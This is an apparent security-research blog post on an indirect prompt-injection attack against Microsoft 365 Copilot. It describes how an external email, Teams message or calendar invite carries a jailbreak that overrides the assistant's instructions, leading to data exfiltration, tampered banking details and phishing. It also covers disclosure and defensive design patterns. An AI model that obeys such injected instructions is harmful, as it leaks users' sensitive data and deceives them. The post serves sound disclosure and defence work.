• Zenity Labs
  • Posts
  • Copilot Vulnerable to RCE: A New Attack Vector Into The Enterprise

Copilot Vulnerable to RCE: A New Attack Vector Into The Enterprise

We Need To Address Promptware Now

Give Me the Bottom Lines

M365 Copilot is vulnerable to ~RCE (Remote CodeCopilot Execution). The vulnerability allows an external attacker to take full control over your Copilot. They can search for and analyze sensitive data on your behalf (your email, teams, SharePoint, OneDrive, and calendar, by default), can execute plugins for impact and data exfiltration, can control every character that Copilots writes back to you and can manipulate Copilot’s references for social engineering. To perform this attack, the attacker needs no prior access or knowledge of your systems. They only need to send you a single email, Teams message or calendar invite, which you do not even have to open. The attack is not mitigated or detected by Microsoft’s existing security controls including, E5, Purview and Prompt Shield (true to Aug 11th, 2024). We’ve followed responsible disclosure and are still working directly with Microsoft to apply mitigations (see comment by Microsoft spokespeople). To see it in action, check out our demos.

What Readers Can Expect of This Article

In this article I attempt to clarify the implications of the RCE vulnerability we presented last week at BHUSA titled Living off Microsoft Copilot. This research is getting a lot of attention and there are many misconceptions, so I’m offering this post as an authoritative source. The talk covered Living-off-the-Land techniques as well, but I will cover those in a separate post for clarity. I gave another talk titled 15 Ways to Break Your Copilot, which I’ll cover in a separate post as well. This article is written for everyone in cybersecurity, from executives to practitioners, it is not a technical writeup. I will focus on the RCE vulnerability, the new capabilities attackers gain through Copilot, and what we should do about it. 

Table of Contents

A Primer on Microsoft Copilot

Why Microsoft Copilot is so Important

There are many AI apps out there, but there’s only one being adopted by the world’s largest enterprises. At the pace of a startup. You normally wouldn’t expect a large bank or government agency to adopt bleeding edge technology. But that’s exactly what’s happening with Copilot.

At the same time, we’re still learning to build secure AI apps. New vulnerability categories are being discovered and secure design patterns emerge. The AI rush means that we have no buffer before these newly discovered vulnerabilities lead to an impact on the enterprise.

This combination of things is what drove us to focus on Microsoft Copilot.

How Copilot Works

The Orchestrator and Just-In-Time Apps

A ‘normal’ application can do exactly what its developers allowed it to do, no more no less. Unintended behavior is common (i.e. bugs or security vulnerabilities), but they are still coded into the app. AI apps are different; they do not have every possible execution path written out explicitly. Instead, they are granted a collection of capabilities which they can call and compose ‘at will’. Think of a list of functions like search_enterprise_data(query), search_web(query), send_email(to, cc, submit, content). Each function might have parameters that need to be passed. AI can use each function zero or many times, and can also compose these functions and pass data from one to the other. The component of the AI app that is in charge of selecting and composing capabilities is typically called The Orchestrator. The word ‘The’ here is confusing. This is typically not one, but many different components which do no more than prompt an LLM with templated formats, and call code-based functions based on the LLM’s response.

A useful way to think about it, is that AI creates Just-In-Time Applications to respond to a user prompt. Those applications are written, run and then disposed of all in the context of one user prompt. Components available to the AI apps are used as building blocks. The user’s prompt is used as spec. The Orchestrator combines the two into a JiT app, which is then executed, its results analyzed by an LLM, and served to the user. JiT apps end up looking very much like no-code automations, a series of building blocks executed one after the other. This is not an accurate representation of what actually happens since JiT apps aren’t written in code. But this abstraction helps reason about what’s going on, and suggests what could go wrong and why.

Copilot’s Built-In Capabilities

Copilot for M365 comes built in with the following capabilities. It can search the enterprise graph, which is the AI-equivalent of using Microsoft’s Enterprise Search. This grants access to your emails, Teams messages, calendar invites, contacts, SharePoint sites and OneDrive files. It can also search the web through Bing Search, the AI-equivalent of using Bing yourself. Note that AI can only view the information Bing has about search results and cannot visit those websites directly. For a human, that would mean being able to search Bing and read previews, but not click any link out of the results. Copilot can also print out references to files or web content, which reduce hallucination and make its responses credible. References are also the basis of the key security mechanism for Copilot, sensitivity labels.

Copilot knowledge base can be extended with Graph Connectors, with common scenarios including file systems, ITSM, ERP and CRM. Once set up, Copilot will search through extensions alongside your M365 instance, again through enterprise search.

Copilot Plugins

With a few clicks, users can create and share new capabilities for Microsoft Copilot. They can choose out of tens of thousands of existing operations supported by the Power Platform, or write their own connectors. These can write emails, delete files, generate security tokens, connect on-prem, change your Salesforce CRM and so much more. Plugins are created with Copilot Studio and present many challenges to build securely, which I’ve covered in a separate BHUSA talk titled 15 Ways to Break Your Copilot. On top of those risks intrinsic to Copilot Studio, plugins give Copilot the ability to act on your behalf.

A New Vulnerability Class: ~RCE (Remote CodeCopilot Execution)

An RCE (Remote Code Execution) has three things that make it meaningful. First, an attacker needs to be able to inject data from an external source, which is where ‘Remote’ comes from. Second, that data needs to be interpreted as instructions, in RCEs that means the data is wrongfully read as code for the application to run, ‘Code Execution’. Third, for the RCE to have an impact that code must be able to do something impactful like exfiltrate sensitive data or delete a record.

An ~RCE (Remote CodeCopilot Execution) accomplishes the same thing, adjusted to AI apps. It doesn’t matter whether it’s an app written with code or a Just-In-Time app written in the English language by AI, the impact of an ~RCE is the same.

Remote Code Execution (RCE)

Remote Copilot Execution (~RCE)

Remote

External party can inject data to the application context

External party can inject data to the application context

Code Execution

Data interpreted as code

Data interpreted as LLM instructions

Impactful

App code can perform impactful operations

AI capabilities can perform impactful operations

~RCE in Microsoft Copilot

Our research demonstrates a full ~RCE vulnerability in Microsoft Copilot for M365. Remote injection of data is accomplished via a simple email, Teams message, or calendar invite. Code Execution is accomplished with a jailbreak. Impact with enterprise search, social engineering and plugin execution.

~RCEs are an application security vulnerability, not an LLM vulnerability. They stem from the way the AI app is built, how it combines code, capabilities and LLM prompts, and how it interacts with its environment.

A Way In

When you ask Copilot to ‘summarize my email’ (the first template Microsoft suggests), Copilot must read your email. Our way in then is just to send you an email. This way, whenever Copilot decides to read your email, it will find our malicious email as well. The same technique could be used via a Teams messages (Copilot can read external messages even if the user hasn’t accepted them) and calendar invites.

This means the attack is surgical – an attacker needs to guess what the victim will ask Copilot in advance, to send the right email. That’s very easy, of course, given Microsoft’s helpful prompt templates. Note that the attacker doesn’t need the word-by-word prompt the victim is going to use, but only a high-level understanding of the question.

Jailbreak

Once our malicious content enters Copilot’s context, we need to convince Copilot these are new instructions. These instructions must override the system message, the victim’s question, and any security mechanism Microsoft has implemented. Tamir wrote a brilliant blog series about that, which I encourage you to read to get the details, including the payloads. We can fully control every decision Copilot makes to use capabilities, every character it outputs and every reference it cites.

There is nothing special about the jailbreak we used. Once Microsoft deny-lists it, finding another one or permutating the existing one would take a few minutes on average and a few hours at most. If you’re skeptical or believe that more advanced models just around the corner will ‘fix it’, check out the jailbreaking community. More advanced models become easier to break, according to them, due to the extended attack surface. 

Trying to enumerate jailbreaks is a moot project doomed to fail. It didn’t work for malware, it sure isn’t going to work for human language.

A Way Out or a Way to Impact

Once we’re in, what can we do? Well, we can do anything Copilot can do. If you’ve got a plugin enabled which can send data elsewhere, your data is now mine. If you’ve got browsing enabled, I can exfiltrate data through the choice of search. And in all cases, I can use Copilot to manipulate you.

Here are the capabilities we have demonstrated:

  1. Data exfiltration - getting Copilot to search for, analyze and exfiltrate sensitive data via Bing search results [video]

  2. Hijacking a financial transaction - getting Copilot to manipulate banking information while keeping original file references for trustworthiness [video]

  3. Phishing with Copilot as a malicious insider - getting Copilot to lure its users to our malicious phishing website [video]

Collaboration With Microsoft

Responsible Disclosure

We have gone through Responsible Disclosure and have been working directly with the Microsoft team to clarify findings and drive fixes where possible. MSRC and Microsoft internal security teams have been highly engaged, and we have an ongoing collaboration. Our experience working with Microsoft on these findings has been very positive. See comment by Microsoft spokespeople.

Microsoft’s Responsibility

Our research showed that Microsoft has indeed put significant effort trying to secure Copilot. We identified 10 different security mechanisms, though they all fail to prevent this attack. We expect Microsoft will continue to invest heavily in this space. But as mentioned above, ~RCEs will not be ‘solved’ and this problem is not going anywhere. Like everything in cybersecurity, there is a Shared Responsibility here, and that is even more important when we’re talking about plugins. Own your risk.

Microsoft does deserve criticism for lack of observability. Microsoft Copilot is a black box. Customers cannot monitor it properly without buying another monitoring product that only Microsoft can sell. Third party security vendors must reverse engineer Copilot to figure out how to secure it, introducing bad tradeoffs. The orchestrator is a mystery. The only thing we get is a meaningless marchitecture. Such an important piece of software that is embedded in the heart of every major enterprise in the world must be observable by all, not just by internal Microsoft teams building add-on security products.

Implications

The implications of this research go well beyond Microsoft Copilot. It applies to any AI app that wants to be useful. I offer four main takeaways:

There is No Free Lunch

Once you give AI access to data, which is the very thing that makes it useful, you’ve introduced an attack surface for ~RCEs. ~RCEs are a fundamental issue with AI apps, they are not going away. This is going to be a cat and mouse game we’ll continue to play as long as AI apps don’t have a strong boundary between data and instructions.

Treat AI Apps Like Experimental Drugs

The cybersecurity and developer communities are still learning how to build secure AI applications. New vulnerability classes are still being discovered, and mitigations tried out. 

One example is Johann Rehberger’s work on data exfiltration through markdown images. Thanks to Johann, we now know that letting AI apps render images at will is a serious anti-pattern. Once an attacker gets an ~RCE, rendering an image allows them to exfiltrate data without any user clicks. The common mitigations are setting Content Security Policy or disabling markdown rendering entirely. Yet, because Copilot is so quickly adopted by the enterprise, we are learning of these mitigations while already being widely vulnerable.

AI is amazing, and we all want to use it as much as we can to boost our productivity. So there are good reasons to take the risk, just like experimental drugs. But if you enter a drug trial, you do your own risk assessment. Defenders, you must own your own risk, nobody, including Microsoft, will own it for you.

Beware the Devil You Know (Reinvigorated Access Control Won’t Save Us)

Our collective conversation about Microsoft Copilot and ChatGPT has been FUD-based. As a result, we’ve entered collective tunnel vision, focusing on the Devil We Know instead of the new threat surface that AI apps introduce - ~RCEs.

First, we were all worried about employees pasting data to ChatGPT. Then, we were worried about Microsoft Copilot helping employees find sensitive data they unknowingly have access to. Don’t get me wrong, these are important topics. But they have nothing to do with AI. Employees pasting data to untrusted sources is an issue we’ve been trying to mitigate for years, first with network-based proxies and lately with browser extensions. Employees snooping around for sensitive information is also an old problem. Consider how many of us were worried about Enterprise Search, which can reveal the same sensitive results. Access controls and solutions that help with application of PoLP have been with us for years, and we will probably continue to struggle with applying them.

The new attack vector that AI apps bring into the enterprise is ~RCEs. An attacker sends an email and can act on behalf of your account. No account compromise needed.

Implement Emerging Design Patterns Quickly, Or Else

If you’re building an AI app, follow design patterns identified by the community. These don’t mitigate the problem, but they cut down on its sharp edges. Of course, these would reduce the usability of your app. The choice is up to you.

  1. Don’t have your clients render markdown, html, images or links (limit data exfiltration).

  2. If you must enable any of the above, enforce Content Security Policy (limit data exfiltration).

  3. Require user consent for sensitive capabilities (limit impact).

  4. Don’t bake user identities within plugins (limit privilege escalation).

  5. Build observability into your AI bot (prevent security vendors having to proxy your bot to build an inline control).

Promptware: The Missing Piece and A Way Forward

We’re clearly not in a good state right now. What could be the way forward?

Consider how infosec handles the threat of malware. Could you imagine an attacker sending files to one of your enterprise users without having malware mitigation in place? Well, of course you can, we do have a ransomware pandemic. But your organization likely invests significant resources to ensure that doesn’t happen. Every file that hits your enterprise gets scanned, whether it’s through email, SharePoint, or direct user download.

The collective cybersecurity communicate has heavily invested in identifying and curtailing malware. From AVs to EDRs and detonation chambers. Today’s EDRs embed themselves deep into the OS so they can fight malware and prevail. EDRs focus on bad behavior rather than enumerating bad hashes, and getting an accurate measurement of those behaviors from the OS. They also act natively within the OS to curtail malware when identified, essentially living off the land and using it for good.

But what about promptware, content with hidden malicious instructions? There’s a new category of malicious content and we’re doing nothing to prevent it from entering the enterprise. An email containing hidden instructions, sent from a random person on the Internet, should not be brought into Copilot’s context. Especially not if that context can freely be escalated, through prompt injection, to collect more sensitive content or perform operations. 

This term is useful because it comes preloaded with expectations about ownership, process, technical controls, mitigations, and tradeoffs. It also clarifies that we won’t solve the threat of promptware, but rather manage it. Playing a never-ending cat and mouse game.

Finally, this term reminds of the severity of this attack vector and the necessity of covering it. We should apply the same level of seriousness to promptware as we do to malware. Addressing promptware requires the same level of scrutiny we apply to malware.

We can apply lessons learned from combating malware and apply them to promptware. The shift from AVs to EDRs tells us that we should focus on Copilot’s behavior under the influence of promptware, rather than enumerating jailbreaks (which as mentioned above, is a moot anyway). The effort that EDR puts into accurate measurement through intimate knowledge of the OS tells us that we need to develop independent observability of Copilot through intimate knowledge of M365. The R in EDR, clearly exemplified with active ransomware protection capabilities deeply embedded into the OS, teaches us that we must build active defensive measures deeply embedded into business applications. The OS is the battleground for fighting malware. Business applications, and M365 first and foremost, are the battleground for fighting promptware.

This has a massive implication on the kind of security controls we can expect to work. Treating Copilot as just another AI app, scanning its inputs and outputs for a list of bad words, will not help us protect against promptware leading to ~RCEs. It’s like trying to fight malware without understanding the OS the malware is targeting, noisy and ultimately irrelevant. Instead, we must invest in Detection and Response for AI apps based on the ecosystems in which they operate. Developing deeply-integrated observability and counter-measures for promptware. Securing Copilots relies on business applications for Microsoft Copilot, Gemini and ChatGPT Enterprise, and the developer ecosystem around Github for Github Copilot.

Reply

or to participate.